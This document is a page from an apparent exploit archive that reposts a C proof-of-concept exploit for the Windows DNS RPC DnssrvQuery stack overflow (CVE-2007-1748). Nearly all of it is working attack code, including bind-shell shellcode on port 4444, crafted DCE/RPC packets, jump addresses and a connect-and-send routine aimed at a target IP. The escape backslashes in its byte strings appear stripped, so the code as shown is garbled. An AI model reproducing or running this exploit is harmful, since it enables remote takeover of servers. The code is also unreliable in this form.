Home / exploits mswin-dns-overflow.txt
Posted on 17 April 2007
/* * Copyright (c) 2007 devcode * * * ^^ D E V C O D E ^^ * * Windows DNS DnssrvQuery() Stack Overflow * [CVE-2007-1748] * * * Description: * A vulnerability has been reported in Microsoft Windows, which can * be exploited by malicious people to compromise a vulnerable system. * The vulnerability is caused due to a boundary error in an RPC interface * of the DNS service used for remote management of the service. This can * be exploited to cause a stack-based buffer overflow via a specially * crafted RPC request. The DnssrvQuery function is vulnerable to this stack * overflow. * * * Hotfix/Patch: * None as of this time. * * Vulnerable systems: * Microsoft Windows 2000 Advanced Server * Microsoft Windows 2000 Datacenter Server * Microsoft Windows 2000 Server * Microsoft Windows Server 2003 Datacenter Edition * Microsoft Windows Server 2003 Enterprise Edition * Microsoft Windows Server 2003 Standard Edition * Microsoft Windows Server 2003 Web Edition * Microsoft Windows Storage Server 2003 * * Tested on: * Microsoft Windows 2000 Advanced Server * * This is a PoC and was created for educational purposes only. The * author is not held responsible if this PoC does not work or is * used for any other purposes than the one stated above. * * Notes: * <3 Metasploit for releasing it yesterday, only had time to look at it * this morning. Also props to Winny Thomas. * * There are two ways we can embed shellcode. One is to pad each byte of * the shellcode with '' and jmp EBX. The other way is the one Winny used * which is to pass in the shellcode as the third argument in the rpc function * and jmp EDX after incrementing it appropriately. I used the latter :) * * ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye * * */ #include <iostream> #include <windows.h> #pragma comment( lib, "ws2_32" ) /* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov http://metasploit.com */ unsigned char uszShellcode[] = "x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab" "x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2" "x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca" "x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56" "x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37" "x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe" "x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde" "x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04" "xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19" "x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8" "xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81" "xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba" "x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f" "x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d" "x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04" "xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb" "x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90" "x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96" "x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02" "xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85" "x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d" "x7dxe0xa6xd2xabx1fx00"; /* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */ unsigned char uszDceBind[] = "x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00" "xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00" "xA4xC2xABx50x4Dx57xB3x40x9Dx66xEEx4FxD5xFBxA0x76" "x05x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00" "x2Bx10x48x60x02x00x00x00"; /* DnssrvQuery: opnum 1 */ unsigned char uszDceCall[] = "x05x00x00x83x10x00x00x00x7fx06x00x00x01x00x00x00" "x57x06x00x00x00x00x01x00xa4xc2xabx50x4dx57xb3x40" "x9dx66xeex4fxd5xfbxa0x76x10xc2x40x00x02x00x00x00" "x00x00x00x00x02x00x00x00x44x00x00x00x94xfax13x00" "xccx04x00x00x00x00x00x00xccx04x00x00"; unsigned char uszDceEnd1[] = "x41x00xb8xc0x40x00x57x01x00x00x00x00x00x00x57x01" "x00x00"; unsigned char uszJmps[] = /* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */ "x5Cx29x5Cx4Cx5CxE1x5Cx77" /* inc edx, jmp edx */ "x5Cx42x5Cx42x5Cx42x5Cx42" "x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42" "x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42" "x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42" "x5Cx42x5CxFFx5CxE2"; void usage( ) { printf(" Microsoft Windows DNS RPC Stack Overflow " " (c) 2007 devcode " "usage: dns.exe <ip> <port> "); } int main( int argc, char **argv ) { WSADATA wsaData; SOCKET sConnect; SOCKADDR_IN sockAddr; char szRecvBuf[4096]; unsigned char uszPacket[1663]; int nRet; if ( argc < 3 ) { usage( ); return -1; } if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) { printf("[-] Unable to startup winsock "); return -1; } sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); if ( sConnect == INVALID_SOCKET ) { printf("[-] Invalid socket "); return -1; } sockAddr.sin_family = AF_INET; sockAddr.sin_addr.s_addr = inet_addr( argv[1] ); sockAddr.sin_port = htons( atoi( argv[2] ) ); printf("[+] Connecting to %s:%s ", argv[1], argv[2] ); nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot connect to server "); return -1; } printf("[+] Sending DCE Bind packet... "); nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send "); return -1; } nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); if ( nRet <= 0 ) { closesocket( sConnect ); printf("[-] Recv failed "); return -1; } memset( uszPacket, 0x5C, sizeof( uszPacket ) ); memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 ); memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 ); memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) ); memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) ); printf("[+] Sending DCE Request packet... "); nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 ); if ( nRet == SOCKET_ERROR ) { closesocket( sConnect ); printf("[-] Cannot send "); return -1; } printf("[+] Check shell on port 4444 :) "); nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 ); closesocket( sConnect ); return 0; }
